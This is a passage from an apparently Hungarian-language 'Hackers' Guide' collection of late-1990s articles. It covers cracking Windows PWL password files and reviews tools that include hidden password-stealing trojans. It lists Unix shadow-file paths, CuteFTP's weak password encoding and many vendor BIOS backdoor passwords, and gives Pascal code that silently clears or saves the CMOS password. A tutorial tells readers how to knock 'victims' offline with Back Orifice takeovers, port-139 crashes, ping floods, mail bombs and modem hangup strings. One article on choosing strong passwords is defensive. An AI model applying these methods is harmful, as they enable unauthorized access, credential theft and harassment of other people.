AKTUÁLIS felhasználóét. Ha egyszer már belépett az ember, akkor a jelszava már<br />

nyilván adott, és így tud hozzáférni a program ezekhez. Tehát ha egy hazahozott<br />

PWL-lel van dolgod, akkor ez a módszer nem jöhet számításba. Ha viszont nem<br />

figyel oda az ismerosöd, vagy internetes kávéház, vagy ilyen helyre tévedsz, akkor<br />

valóban sok hasznát lehet venni. Természetesen, azt mondanom sem kell, hogy NE<br />

lemezen vidd magaddal, (engem is kitiltottak a könyvtárból miatta... :( ), hanem küldd<br />

el egy ingyenes mail címre, amihez ott is hozzáférhetsz. Oszintén szólva viszont,<br />

amelyik ingyenes hely ilyen lazán veszi a dolgot, hogy a saját felhasználó felületen<br />

hozzáférést enged a jelszavakhoz, az magára vessen... :) Viszont láttam olyan<br />

megoldást, hogy az internetes jelszóhoz csak a rendszergazda fért hozzá, és a többi<br />

felhasználó a szerveren keresztül csatlakozott az internetre. Ebben az esetben sem<br />

ér semmit ez a pwlcrack. (Ja, a DialPwd egyes vírusírtók szerint trójaival fertozött!<br />

Semmiképpen sem javaslom.) Mi volt a megoldás? Haza kellett vinni az összes<br />

PWL-t, és nekiállni a feltörésnek.<br />

Hogyan törjük?<br />

A PWL fájloknál egy alapvetoinformációra van szükség a töréshez, különben<br />

fölösleges vele szenvedni. Az egyik a felhasználónév. Ezt a Windows is kiírja a<br />

vezérlopult/felhasználók menüben, illetve a fájl nevébol is lehet rá következtetni.<br />

(Vagy pwlhack-kel a /grab opció) A Windows a system.ini-ben tartja, hogy melyik<br />

pwl-hez milyen felhasználónév tartozik. Ha van egy petra.pwl nevu fájlod, akkor a<br />

felhasználónév tuti hogy Petra. Kis nagy betu nem számít. (Ékezetben viszont lehet,<br />

ezt nem tudom.) A Windows az alapján adja a fájlnevet, hogy mi a felhasználónév.<br />

Csak 8 karaktert használ, tehát a rendszer.pwl felhasználóneve lehet rendszer, de<br />

lehet akár rendszergazda is. Az ékezeteket nem haszál a Windows. Ha két<br />

ugyanolyan fájl keletkezne, akkor az újabbnak egy számot rak a végére. Ezért<br />

szerencsés inkább a megnézni a system.ini-ben...<br />

Megvan a felhasználónév, most már csak a jelszóra van szükség. Két módszert<br />

szeretnék bemutatni, alapveto törési eljárások :)<br />

Dictionary Attack:<br />

Ez azt jelenti, hogy egy szótárállományból a töro program végigpróbálja az összes<br />

szereplo szót. Ez akkor hasznos, ha a hülye felhasználó valami gyakori kódot adott<br />

meg. (pl: titanic) Elonye a módszernek hogy gyors, és (tapasztalat) gyakran sikeres.<br />

:) Szükség van a szótárállományra, jobb programok mellé adják, és természetesen<br />

sajátot is lehet használni. Az külön extrának számít, ha néhány variációt is kipróbál a<br />

program soronként, például mellérak egy számot (kutyus01, kutyus02, stb.) vagy<br />

megpróbálja a fordítottját. (dog->god)<br />

Brute Force:<br />

Nyers ero. Hogy miért ilyen hülye nevet adtak neki, az szerintem örökké rejtély<br />

190


Hackers’ Guide<br />

marad. Talán azért, mert az ilyen módszerhez elég eros processzorú gépre van<br />

szükség, hogy elviselheto legyen a sebesség. Még mindig nem mondtam hogy mi<br />

ez... tehát ezzel a módszerrel a kódtöro az összes létezo variációt próbálja végig. Ez<br />

természetesen a jelszó hosszúságával arányosan no (hatványosan...). A választható<br />

karakterek száma határozza meg a lehetoségek számát (kombinatorika). Pl. egy<br />

angol szó a jelszó, nincs benne ékezet, nincs benne szám, nincs benne más<br />

karakter, akkor a használható angol ábécé 26 karaktere jöhet számításba, és így<br />

mondjuk egy öt karakteres jelszó esetén a lehetoségek száma 26*26*26*26*26, azaz<br />

26^5. Ez 11881376. Értheto így már, hogy miért tart ez hosszabb ideig? :) Elonye<br />

viszont kétségkívül az alaposság és hogy nem marad ki semmi, meg hogy tuti<br />

meglesz az amit keresel... :)<br />

A sebességrol nem szeretnék mondani, mert függ a processzortól, függ a karakterek<br />

számától...<br />

Most már csak egy dolgot nem mondtam el, hogy milyen szoftverekkel állhatunk neki<br />

dolgozni...<br />

GLIDE:<br />

Amit semmiképpen nem ajánlok, az a Glide. Egyszeruen sehogyan sem sikerült a<br />

programot muködésre bírni. Felhasználónevet alapértelmezésként a fájlnévnek<br />

tekinti, és folyton kérdez. Csak Brute Force-ot támogat. Cached Passwords-ot nem<br />

tudja, és úgy néz ki, hogy csak az alap W95 fájljaihoz jó. Egyetlen elonye talán az,<br />

hogy egy C++-ben írt forrást adnak mellé. Természetesen sz@rra nem lehet<br />

építkezni... :)<br />

PWLCRACK<br />

Egyes hackeroldalon hangoztatott állításokkal szemben a PWLCRACK egy Win32<br />

alkalmazás, nem indul el DOS alatt. Az más kérdés, hogy karakteres képernyot<br />

használ, nem ablakozik. De persze ennek köze sincs az OS-hez, de ezt hagyjuk.<br />

A program csak a cached password-öket írja ki. Szabvány API hívással muködik.<br />

DIAL-UP<br />

Az elozohöz hasonló program, szintén csak a cached passwordshöz jó. Külön<br />

elonye, hogy kiír a Windows registrybol is minden használható információt az<br />

internetes beállításokra vonatkozólag. Tehát DNS szerverek, IP cím, login script, stb.<br />

PWL HACK:<br />

Ez egy jó kicsi, orosz program. Elonye az elozovel szemben, hogy muködik. :)<br />

Támogatja a Brute Force, és a Dictionary módokat is, és a megszakított keresést is<br />

folytatni tudja. Van mellé egy kis forrás is C, természetesen. A megfejtett külso PWLbol<br />

is, sot az aktuális felhasználó cached passwords-ét is kijelzi, tehát a PWLCRACK<br />

progi lehetoségeit is magában foglalja.<br />

Van még neki az említett grab funkciója, ami kimenti a felhasználóneveket. A spy<br />

funkció látja el a PWLCRACk dolgát. Nagyon gyorsan dolgozik a BruteForce-szal,<br />

lényegesen gyorsabban mint a Wines társai.<br />

Az progi dpmi alkalmazás, fut DOS-ból és Winbol is. Nem grafikus a felülete,<br />

paraméterezgetni kell. Az elozo progik kicsik, ennek a mérete viszont 400k körül<br />

mozog. A SAC-on is megtalálható :)<br />

CAIN & ABEL:<br />

1. Képernyovédo jelszava, rögtön és kapásból.<br />

2. Külso regisztrybol ugyanez.<br />

191


Hackers’ Guide<br />

3. A számítógépen levo fájlmegosztást, nyomtatómegosztást stb. jelszavait is<br />

kapásból megmutatja.<br />

4. Pwlcrack is, tehát aktuális felhasználó cached passwordjei.<br />

5. Egy PWL töro, Dictionary, és Brute Force elven is, és egész jó WordListet adnak<br />

hozzá!!<br />

6. Helyi hálón levo shared jelszavak kijelzése (Sajnos csak egy gépem van, nem<br />

tudtam kipróbálni.)<br />

7. Abel client. Ez egy BO szeru administrator tool :) gyengébb képességekkel,<br />

elsosorban jelszóra kiélezve. Muködik LAN-on és Interneten is. Az Abel szerver<br />

benne van a Cain 1.51-ben, ami mellesleg FREE szoftver is, az 1.0 még fizetos volt.<br />

Természetesen crack létezett hozzá... :) Sajnos viszont a BreakDance rakott az Abel<br />

szerverbe egy figyelmezteto ablakot, hogy "You are under monitoring", szóval nem<br />

az igazi...<br />

Van neki egy toggle password caching funkciója, amivel ki lehet kapcsolni, hogy a<br />

Windows megjegyezze a jelszókat. Ekkor viszont minden alkalommal újra be kell írni<br />

oket. El tudja távolítani az aktuális felhasználó cached resources bejegyzéseit.<br />

Az egész program Win alapú, szép, könnyu kezelofelülettel. Egy hátránya, hogy az<br />

elozo 10k-s programok mellett ez 600k fölött van.<br />

PWLTOOL<br />

A Cainnak egy komoly vetélytársa. Mondhatjuk azt, hogy mindent tud, amit az<br />

elozorol elmondtam. Képernyovédo, shared passwords, cached passwords, stb.<br />

Brute Force, Dictionary, és még ketto törési mód van benne. A töréshez lehet a<br />

szabvány API hívás, és a program "módszere" között választani. Természetesen ez<br />

utóbbi lényegesen gyorsabb. Sokkal jobb sebességeredményt lehet így elérni.<br />

Ebben is megtalálható a password lopáshoz egy kis trójai program. Úgy elbújik, hogy<br />

még a trayben sincs, sot ctrl+alt+del-re sem jön elo.<br />

A programnak egy nagy hibája van. Nagyon pénzéhes, és regisztráltatni akarja<br />

magát. Hát ez felháborító! Nem gondoljátok? Nincs valakinek a hatos verzióhoz<br />

törése?<br />

A történet vége, ennyi és kész!<br />

RSC (TM)<br />

************************************************************************************************<br />

Password fileok keresése<br />

Ez a táblázat leírja hogy különbözõ operációs rendszerekben hol találod a passwd<br />

fajlt !<br />

192


Version Path Token<br />

-----------------------------------------------------------------<br />

AIX 3 /etc/security/passwd !<br />

vagy /tcb/auth/files//<br />

A/UX 3.0s /tcb/files/auth/?/*<br />

BSD4.3-Reno /etc/master.passwd *<br />

ConvexOS 10 /etc/shadpw *<br />

ConvexOS 11 /etc/shadow *<br />

DG/UX /etc/tcb/aa/user/ *<br />

EP/IX /etc/shadow x<br />

HP-UX /.secure/etc/passwd *<br />

IRIX 5 /etc/shadow x<br />

Linux 1.1 /etc/shadow *<br />

OSF/1 /etc/passwd[.dir|.pag] *<br />

SCO Unix #.2.x /tcb/auth/files//<br />

SunOS4.1+c2 /etc/security/passwd.adjunct ##username<br />

SunOS 5.0 /etc/shadow<br />

System V Release 4.0 /etc/shadow x<br />

System V Release 4.2 /etc/security/* database<br />

Ultrix 4 /etc/auth[.dir|.pag] *<br />

UNICOS /etc/udb *<br />

Hackers’ Guide<br />

D3viL^Woodoo<br />

************************************************************************************************<br />

Hogyan válasszunk rossz jelszót<br />

Ez a cikk fordítás, de sajnos nem tudom az eredeti szerzot, mert az angol cikkben<br />

nincs feltüntetve.<br />

Miután szereztél egy accountot egy számítógépre, meg kell választanod a jelszót<br />

hozzá. A jelszó megvédi a munkádat a számítógépen. Vannak jó jelszavak és rossz<br />

jelszavak. A rossz jelszó lehetové teszi másoknak, hogy használják az accountodat<br />

és elolvassák a fájlokat, vagy letöröljék a munkádat. Feltételezem, hogy nem akarod,<br />

hogy valaki más megtegye ezt, de ha mégis ezt akarod, akkor az alábbiak szerint kell<br />

eljárnod, hogy könnyebbé tedd a dolgát:<br />

1. Ha azt akarod, hogy nagyon könnyu dolga legyen, akkor a jelszó legyen a<br />

felhasználói azonosító, vagy a neved. Ez az, amit a jó feltöroprogramok eloször<br />

kipróbálnak.<br />

2. Ha ez nem tetszik, akkor a jelszó legyen a nickneved, a középso neved, vagy a<br />

születési éved, vagy egyéb információ, amihez bárki publikusan hozzájuthat egy<br />

nyilvántartásból vagy a finger paranccsal.<br />

3. Legyen a jelszó a barátnod/barátod/testvéred/háziállatod/gyereked neve. (Ha<br />

láttad a War Games címu filmet, akkor visszaemlékezhetsz, hogy a<br />

szuperszámítógép jelszava Falken professzor fiának a neve volt: Joshua.)<br />

4. Vagy válassz valami egyszeru, könnyen megszerezheto információt, pl. a<br />

telefonszámodat, az irányítószámodat, vagy a születésnapod dátumát, stb.<br />

193


Hackers’ Guide<br />

5. Használj szavakat vagy neveket Sci-fi vagy fantasy könyvekbol vagy filmekbol. A<br />

jelszófeltöro gyerekek imádják ezeket, szóval egyszeru lesz nekik kitalálni. Ha<br />

szépirodalomból vagy ókori mitológiából választasz egy nevet, akkor ezeket a<br />

gyerekeket kizárod, és csak a muvelt crackereknek marad esélyük.<br />

6. Ha egy kicsit nehezebbé akarod tenni a munkájukat, használj egy szót valamelyik<br />

szótáradból. Most, amikor már elérhetoek némely online szótárak, bárki írhat egy<br />

programot, amelyik végigpróbálja ezek adatbázisát, amíg meg nem találja a<br />

megfelelot. Lassú, de sokszor muködik.<br />

Namost, ha nem tetszik, hogy valaki más bejuthat az accountodra és elolvassa a<br />

leveleidet és letörölje a fájlokat, akkor itt van néhány tipp, hogy hogyan válassz *jó*<br />

jelszót magadnak:<br />

1. A legjobb jelszó betuk, számok és egyéb karakterek keveréke. Minél komplexebb<br />

és véletlenszerubb, annál nehezebb lesz feltörni. Természetesen nehéz lesz<br />

megjegyezni, tehát próbálj olyan bonyolult jelszót választani, amit azért könnyu<br />

megjegyezni, de másnak nehéz feltörni.<br />

2. Legalább 6 karakter hosszú legyen a jelszó. A rövidebb jelszavakat programokkal<br />

rövid ido alatt fel lehet törni. Az Unix újabb verziói csak minimum 6 karakter hosszú<br />

jelszavakat fogadnak el, és legalább egy karakternek kell benne lenni, ami nem betu.<br />

De ne feledd! Az Unix jelszavak csak 8 karakter hosszúak - a többit levágja a<br />

rendszer.<br />

3. Ha csak egy számot vagy szimbólumot adsz egy szóhoz, az kicsit<br />

biztonságosabbá teheti a jelszót, de ha a szó egy szótári szó, akkor ez nem elég.<br />

Egy ismert jelszófeltöro program könnyedén megfejtette ezt a jelszót: "offbeat1".<br />

Sokkal jobb kombináció az "off1beat".<br />

4. Használj szótöredékeket, szokatlan módon összekeverve, hogy ne forduljon elo<br />

egyetlen szótárban sem; vagy végy egy összetett szót és cseréld fel a darabokat<br />

szokatlan módon. A fenti jelszó még jobb, ha felcseréled az "off"-ot a "beat"-tel.<br />

5. Az obszcén szavak általában nem jó jelszónak, mert bár nem fordulnak elo<br />

szótárakban, de sok jelszótöro program éppen emiatt külön ellenorzi oket.<br />

6. Végy egy szót és helyettesítsd egyes betuit szimbólumokkal. De ne legyen túl<br />

egyszeru. Sok program elég okos ahhoz, hogy az "s" betu helyére "$" -t<br />

helyettesítsen, vagy "1"-et a "l" és az "I" helyére.<br />

7. Egy jó módja a jó jelszóválasztásnak, hogy egy kifejezés szavainak kezdobetuit<br />

veszed jelszónak. Pl. válassz egy versszakot egy versbol, és a szavak vagy sorok<br />

kezdobetuit vedd jelszónak. Ez eléggé véletlenszeru karaktersorozatot ad, amelyet te<br />

könnyen megjegyezhetsz, de nehéz feltörni, és ha valaki látja, nehezen tudja<br />

megjegyezni.<br />

8. Egyes betuket nagybeture változtatni, vagy fordítva (pl. PasSworD) nehezebbé<br />

teszik a feltörést, de nem lehetetlenné.<br />

9. Lejárt rendszámok, jogosítványszámok jók jelszónak, de a jelenlegi adataidat soha<br />

ne használd. Az NCC-1701 nem jó jelszó - túl sok cracker nézi a Star Treket.<br />

194


Hackers’ Guide<br />

10. Nem angol nyelvu kifejezések jobbak, mint az angol nyelvuek, de ha a cracker<br />

tudja, milyen nyelven van, megválaszthatja a megfelelo nyelvu szótárfájlt.<br />

Használj egy nem angol szót, és kombináld valamelyik fenti trükkel: ez eros jelszót<br />

ad, és könnyen megjegyezheted. Itt van még egy pár tipp:<br />

1. Gyakran változtasd meg a jelszavadat. Még ha valaki fel is töri a jelszavadat, nem<br />

sokáig tudja majd használni. Nehéz lehet ezt a szabályt betartani, kösd valami más<br />

eseményhez. Például ha minden hónapban megváltoztatod a jelszót, akkor pl. tedd<br />

akkor, amikor befizeted a számláidat, vagy változtasd meg mindig, amikor matekból<br />

dolgozatot írtál. Néhány számítógép "password aging" -et használ, ami arra<br />

kényszerít, hogy gyakran változtasd meg a jelszót. Ez hasznos dolog, ha nem túl<br />

gyakori ahhoz, hogy idegesíto legyen.<br />

2. Soha ne add oda a jelszavadat senkinek. A számítógép rendszergazdájának<br />

nincs rá szüksége, és amúgy is ki tudja találni (egy cracker programot futtatva a saját<br />

rendszerén). Ha valakitol olyan levelet kapsz, amelyben a jelszavadat kérik, az<br />

bizonyára egy cracker. Jelezd a rendszergazdának.<br />

3. Ha szerinted valaki látta, amikor beírtad a jelszót, minél hamarabb változtasd meg.<br />

Unix rendszereken ezt a "passwd" paranccsal teheted meg.<br />

4. Ha csak egy mód van rá, ne írd le a jelszót. Ha mégis le kell írnod, ne jelöld meg,<br />

hogy mihez van a jelszó. Ha valaki ilyet lát a számítógépeden, hogy "xyzzy", akkor<br />

még nem tudja, mi az, de ha ezt látja "a jelszavam xyzzy", akkor már igen.<br />

(Egyébként xyzzy egy kulcsszó egy számítógépes játékban, tehát amúgy sem jó<br />

jelszó :)<br />

5. Ha több számítógépen dolgozol, és nem ugyanazt a jelszófájlt használják, akkor<br />

mindegyik számítógépen használj más-más jelszót. Ha valaki feltöri az egyik<br />

jelszavadat, akkor attól még a másikba nem jut be.<br />

6. Ne küldj jelszót e-mailen keresztül. Az e-mail nem olyan biztonságos, mint<br />

gondolod.<br />

************************************************************************************************<br />

CuteFTP bizonytalan jelszótárolása<br />

Ez a cikk fordítás, az eredeti cikket írta: cube -cube@boxnetwork.net<br />

A CuteFTP egy fájlban tárolja a jelszavakat egyszeru karakter cserével, ezeket<br />

könnyen nyeri egy kódoló táblából. Ezzel lehetové teszi a távoli támadásoknak, hogy<br />

visszakódolják a jelszavakat, amik a SMDATA.DAT fájlban vannak tárolva. A<br />

rekordok egy speciális jelek alapján vannak elosztva, amit felváltanak a mezok<br />

195


Hackers’ Guide<br />

számai, amik néha különbözo ASCII karakterek alapján vannak behatárolva.<br />

A rekordok ilyen formában vannak tárolva: $? RECORD NAME ? IP ADDRESS ?<br />

USERNAME ? ENCRYPTED PASSWORD ? (a ? egy speciális karaktert jelent). A<br />

mezok részei vagy üresen vannak hagyva, vagy tartalmaznak egy kevés információt.<br />

A kódolás egy ismert egyszeru szöveg, a kódoló algoritmus könnyen levezetheto. A<br />

kódolás elvégzi a jelszó karakterek cseréjét més ASCII értékekre - a=? b=? stb. A<br />

CuteFTP a "session"-ok létrehozásakor ellátja jelszavakkal, mint abcABC stb.,<br />

könnyen megszerezheted az egyes karakterek pontos kódoló értékeit. Ha egy<br />

betolakodó halózati vagy fizikai hozzáférést szerez az SMDATA.<br />

DAT fájlhoz, akkor a jelszavaidnak lottek :). A betolakodó képes lesz kiszedni minden<br />

szükséges információt az SMDATA.DAT fájlból, hogy feltörje az eléréseidet.<br />

A szükséges program forráskóddal:cuteftp.zip<br />

Scalpal<br />

************************************************************************************************<br />

BIOS Hátsóajtók<br />

A legtöbb BIOS gyártó beépített bizonyos hátsóajtókat. Általában nem publikálják<br />

őket, mert kicsit "égő" dolog, hogy ezek után bármilyen BIOS jelszó megadása<br />

semmit sem ér... =)<br />

Például az AWARD BIOS simán "feltörhető" az AWARD_SW, AWARD_PW és j262<br />

(kis és nagybetű különbözik!) joker jelszavakkal. AMIBIOS-nak is van joker jelszava.<br />

Ez a BIOSTAR, vagy esetleg AMI.<br />

Az alábbi helyeken még találhatsz további infókat:<br />

http://www.hedgie.com/passwords/bios.html<br />

http://hem.passagen.se/unaxor/cracking.html<br />

http://www.voicenet.com/~raze/files/textfaq/pchack.txt<br />

http://www.geocities.com/Area51/Zone/6430/cracking.html<br />

- H3XR00T -<br />

http://hexnet.hpage.net/<br />

************************************************************************************************<br />

196


BIOS jelszavak feltörése<br />

Hackers’ Guide<br />

Ez foleg attól függ, hogy a gépben milyen BIOS van a gépben. A leggyakoribb BIOS<br />

fajták az Award, AMI, Phoenix. Biztos léteznek más BIOSok is, de én még más típust<br />

nem láttam.<br />

A legtöbb BIOS-ban be lehet állítani egy jelszót, amit szorgalmasan kér is, amikor<br />

hozzá akarsz férni a CMOS setuphoz, illetve bootolni akarsz. A gyártók szerintem<br />

minden BIOS-ba beépítettek gyári jelszavakat, amikkel be lehet lépni bármikor, de<br />

ezeket nem kötik az orrunkra :)<br />

Itt van egy lista, az általam ismert beépített jelszavakról, én nem tudtam mindet<br />

kipróbálni, nekem az AWARD_SW muködött, de azért érdemes próbálkozni ;)<br />

AWARD:<br />

01322222, 1EAAh, 256256, 589589, 589721, ?award, AWARD PW, AWARD SW,<br />

AWARD?SW, AWARD_PW, AWARD_SW, Award SW, CONCAT, CONDO, HELGA-<br />

S, HEWITT RAND, HLT, J64, KDD, PASSWORD, SER, SKY_FOX,<br />

SWITCHES_SW, SZYX, Sxyz, TTPTHA, TzqF, ZAAADA, ZBAAACA, ZJAAADC,<br />

_award, aLLy, aPAf, admin, alfarome, award, award.sw, award_?, award_ps,<br />

awkward, bios*, biosstar, biostar, condo, djonet, efmukl, g6PJ, h6BB, j09F, j256,<br />

j262, j322, j64, lkw peter, lkwpeter, setup, t0ch20x, t0ch88, ttptha, wodj, zbaaaca,<br />

zjaaadc<br />

AMI:<br />

589589, A.M.I., A.M.I., AMI, AMI SW, AMI!SW, AMI.KEY, AMI?SW, AMIPSWD,<br />

AMISETUP, AMI_SW, AMI~, BIOS, BIOSPASS, CMOSPWD, HEWITT RAND,<br />

KILLCMOS, Oder, PASSWORD, aammii, ami.kez, amiami, amidecod, amipswd,<br />

ami°, bios310, helgaßs<br />

Amptron<br />

Polrty<br />

AST:<br />

SnuFG5<br />

Biosstar:<br />

Biostar, Q54arwms<br />

Compaq:<br />

Compaq<br />

Concord:<br />

last<br />

CTX International:<br />

197


Hackers’ Guide<br />

CTX_123<br />

CyberMax:<br />

Congress<br />

Daewoo:<br />

Daewuu<br />

Daytek:<br />

Daytec<br />

Dell:<br />

Dell<br />

Digital Equipment:<br />

komprie<br />

Enox:<br />

xo11nE<br />

Epox:<br />

central<br />

Freetech:<br />

Posterie<br />

HP Vectra:<br />

hewlpack<br />

IBM:<br />

IBM, MBIUO, sertafu<br />

Iwill:<br />

iwill<br />

JetWay:<br />

spoom1<br />

Joss Technology:<br />

57gbz6, technolgi<br />

M Technology:<br />

mMmM<br />

198


MachSpeed:<br />

sp99dd<br />

Magic-Pro:<br />

prost<br />

Megastar:<br />

star<br />

Micron:<br />

sldkj754, xyzall<br />

Micronics:<br />

dn_04rjc<br />

Nimble:<br />

xdfk9874t3<br />

Packard Bell:<br />

bell9<br />

QDI:<br />

QDI<br />

Quantex:<br />

teX1, xljlbj<br />

Research:<br />

Col2ogro2<br />

Shuttle:<br />

Spacve<br />

Siemens Nixdorf:<br />

SKY_FOX<br />

SpeedEasy:<br />

lesarot1<br />

SuperMicro:<br />

ksdjfg934t<br />

Tinys:<br />

Hackers’ Guide<br />

199


Hackers’ Guide<br />

tiny<br />

TMC:<br />

BIGO<br />

Toshiba:<br />

24Banc81, Toshiba, toshy99<br />

Vextrex:<br />

Vextrex<br />

Vobis:<br />

merlin<br />

WIMBIOS v2.10:<br />

Compleri<br />

Zenith:<br />

3098z, Zenith<br />

ZEOS:<br />

zeosx<br />

Egyéb BIOSok, de próbálkozhatsz a AWARD-nál és AMI-nál is:<br />

ALFAROME, BIOSSTAR, biosstar, BIOSTAR, biostar, LKWPETER, lkwpeter, Syxz,<br />

Wodj<br />

Érdemes még próbálkozni a kis/nagy betuk cserélgetésével is...<br />

Ha nem tudsz bootolni a géprol - mert pl. rajta van egy System Commander - akkor<br />

ezek után már csak fizikai megoldás létezik. Két lehetoség van, az egyik az, hogy<br />

kiszedjük az alaplapról az elemet. Ekkor elvileg elveszti a CMOS memória a<br />

tartalmát, de általában szoktak beépíteni valami átmeneti tárolóáramkört, amivel még<br />

kibírja a memória az elemcserét. Ez az ido minden gyártónál más. (Ezt is ki lehet<br />

játszani egy ellenállás segítségével.)<br />

A másik módszer viszonylag egyszerubb, meg kell keresni az alaplapon a CMOS<br />

RAM Clear jumpert, majd rövidrezárni, és bekapcsolni a gépet. Ezután kikapcsoljuk a<br />

gépet és leszedjük a jumpert. Egy újabb bekapcsolás után üres, jelszómentes CMOS<br />

RAM-mal találjuk magunkat szembe :)<br />

Könnyebb a dolog, ha tudsz bootolni a géprol, mondjuk DOS/Win9x alá. Ilyenkor<br />

szoftveresen ki lehet loni a jelszót. Nem árt elotte elmenteni a CMOS tartalmát, hogy<br />

vész esetén vissza tudjuk tölteni. Itt van két sor Pascalban, ami kinyírja a jelszót:<br />

200<br />

port[ $70 ] := $2e;<br />

port[ $71 ]:=port[ $71 ] + 1;


Hackers’ Guide<br />

Az a lényege, hogy átír egy értéket a CMOS RAM-ban, de van egy ellenorzoösszeg<br />

a végén, és ez most hibás eredményt fog visszaadni. Ha ezt alkalmazod akkor<br />

elvesznek a winyók+floppyk beálltásai, meg az ido is.. Újraindítás után a BIOS vagy<br />

nem kér kódot, vagy felajánlja, hogy betölti az alap beállításokat, mintha<br />

bejumperelted volna a Clear CMOS RAM-ot :) Ez nem muködik NT alatt. Itt van egy<br />

másik programrészlet is, ami elmenti a CMOS tartalmát egy fájlba:<br />

var i, c : byte;<br />

cmosfile : file of byte;<br />

begin<br />

assign( cmosfile, 'cmos.ram' );<br />

rewrite( cmosfile );<br />

for i := 0 to 127 do begin<br />

port[ $70 ] := i;<br />

c := port[ $71 ];<br />

write( cmosfile , c );<br />

end;<br />

close( cmosfile);<br />

end.<br />

Mûködése egyértelmû, úgymint a következõ programrészletnek, ami a visszaírást<br />

végzi: (Talán annyit, hogy azért 10h címtõl kezdi, és nem 00h-tól, mert az elsõ Fh<br />

címü bájtokon állandóan változó információk találhatóak pl: óra, perc, évszám, leállás<br />

oka, stb.)<br />

var i, c : byte;<br />

cmosfile : file of byte;<br />

begin<br />

assign( cmosfile, 'cmos.ram' );<br />

reset( cmosfile );<br />

for i := $10 to 127 do begin<br />

port[ $70 ] := i;<br />

read( cmosfile , c );<br />

port[ $71 ] := c;<br />

end;<br />

close( cmosfile );<br />

end.<br />

Így észrevétlenül tudunk piszkálni a gépen, egyszerûen vissza lehet állítani az<br />

eredeti cmos tartalmát.<br />

Ezenkívül még ott van az a lehetõség is, hogy valami kis progival kiíratjuk a jelszót.<br />

Ilyen progit még csak egyet láttam, ami normálisan mûködött is (nálam), de sajna<br />

elveszett :(.<br />

Némely AMI biosokban van egy elég érdekes lehetõség is, ha nyomvatartod<br />

bootoláskor az End gombot, akkor törli a CMOS RAM tartalmát. Biztonság rulez!<br />

Sun-Zero<br />

sun-zero@freemail.hu<br />

201


Hackers’ Guide<br />

************************************************************************************************<br />

Hogyan "lőjjünk" ki másokat a netről?<br />

Denial of Service (DoS)<br />

Ebben az ismertetőben megpróbálom elmagyarázni a módszereket melyekkel<br />

kilőhetsz embereket a netről. Azt nem garantálom, hogy 100% működnek de azért 1<br />

próbát megér! =)<br />

1. Előszöris szerezz be egy jó és gyors! portscannert. Ez azonkívűl, hogy a Conseal<br />

felhasználókat meglepi vagy 10000 popup ablakkal =)) arra jó, hogy kiderítsd, hogy<br />

mégis milyen programok futnak a rendszeren, (mely portok vannak nyitva) vagyis,<br />

hogy hol vannak a leendő áldozatodnak a gyenge pontjai.<br />

2. Ezután meg kell szerezned az áldozat IP-címét, hogy tudd támadni, vagy<br />

szkennelni. Ilyen számot elég egyszerű szerezni. Ha IRC-n vagy akkor egyszerűen<br />

beírod, hogy /dns nick (Értelemszerűen a nick helyére a megtámadni kívánt személy<br />

irc-s beceneve kerül). ICQ alól, az ICQ programod megpatkolásával szerezheted<br />

meg az illető IP-jét. A harmadik módszer az, hogy megnézed a netstat paranccsal,<br />

hogy milyen IP-k csatlakoznak msot hozzád. Valószínű ott lesz az áldozat IP-je is.<br />

4. OK. Mostmár megvan az illető IP-je. Mostpedig vedd elő a gyors kis<br />

portscanneredet és futtasd végig az áldozat IP-jén, hogy megnézd mely portok<br />

vannak nyitva. Fontos, hogy tudd, hogy melyik portszámhoz mi tartozik! Bár a<br />

portscannerek kiírják a default ismertebb portokat www:80 / irc:6667 de ha mondjuk<br />

egy 31337 számú por van nyitva arra már nem bírsz lépni, hogy ez mégis mi a<br />

fenének a portja lehet. (Elárulom: BO default =)) Nos tegyük fel, hogy a portscanner<br />

talált egy nyitott portot pölö a 31337-est. No most ezt szépen megkeresed, hogy<br />

kinek a milye =). És lőn kiderúlt, hogy ez a Back Orifice portja. Ezekután már<br />

elfelejthetsz minden más módszert az illető buherálására, mert már a kezedben is<br />

tartod a rendszerét. Keresel egy BO klient, berod az IP-jét és csatlakozol. Ezek után<br />

bármit megcsínálhatsz vele amit ő megtud. (Mivel a BO erre lett kitalálva. =))<br />

Lehetőleg NE törölj le semmit, inkább nézz körül a gépén hátha találsz valami<br />

érdekeset. Soha sem tudhatod, hogy milyen fontos dokumentumokat törölsz le, amik<br />

lehet, hogy téged is érdekelnének! =)))<br />

5. Ha nem nyert a portscanner, akkor egyszerűen próbáld kilőni a 139-es porton<br />

keresztül. Ha nincs frissítve a rendszere (elég ritka manapság) akkor lekapcsolódik a<br />

netről, vagy csak kap egy "kékhalált" amin már csak a reset segít. =)<br />

6. Mégegy piszkálásnak jó az ICMP smurf nevű kis apróság, vagy egy egyszerű ping<br />

flood amitől leszakad a gépe a netről.<br />

202


Hackers’ Guide<br />

7. Ha tudod az áldozat e-mail címét küldj neki egy levélbombát, vagy írasd fel egy<br />

halom levelező listára.<br />

8. Ha fut az ICQ programja, akkor keress egy ICQ flooder-t és áraszd el üzenetekkel.<br />

Eredmény: meghal az ICQ-ja! =)<br />

9. Keress egy port bombázót, és támadd a nyitott portjait (flood). Ez érdekes<br />

kihatással lesz az IRC-s és ICQ beli teevékenységére... =)<br />

10. Ha csak egyszerűen meg akarod szakítani a net kapcsolatát akkor használd ki a<br />

modemblitz nevű progyt ami egy olyan spéci +++ath0 parancsot küldd amitől a<br />

modem bontja a kapcsolatot... =)<br />

11. Az a legjobb ha az itt lert támadási módszerket egyszerre csínálod. Valószínű<br />

kissé ideges lesz a delikvens... =) A neten rengeteg programot találhatsz a fent<br />

említett módszerek végrehajtására. Csak a képzelőtehettségedre van bízva, hogy a<br />

fent említett trükköket milyen kombinációban használod.<br />

Eredeti: tH3 m4n!4c dancho@mbox.digsys.bg<br />

- H3XR00T -<br />

http://hexnet.hpage.net/<br />

************************************************************************************************<br />

És lőn sötétség a click után...<br />

A BBS-es időkből néhányan emlékezhetnek még az ATDT, ATH0 és egyéb modem<br />

parancsokra [Ehhh... Régi szép idők... Nem tudom, vajon a sok milliomos csemete<br />

akiknek egyszer csak az ölébe szakadt egy PIII, Korlátlan net-előfizetéssel azok<br />

tudják-e még, hogy mi az, hogy BBS, vagy FIDO, vagy ATM0 (hogy ne verjük fel az<br />

egész házat ugye... =)) Szerintem RENGETEGET vesztett az aki ezekből a<br />

dolgokból kimaradt. Nem volt annál jobb mikor egy BBS-en órákat beszéltem a<br />

Sysoppal a világ dolgairól, közben meg jött le egy 20 megás warez 14440-el...=) -<br />

H3XR00T] - de ha mi emberek már elfeledkeztünk róluk, biztosan vannak még olyan<br />

lények, akik tudják mik ezek - s ezen lények nem mások mint a modemek. Ez a<br />

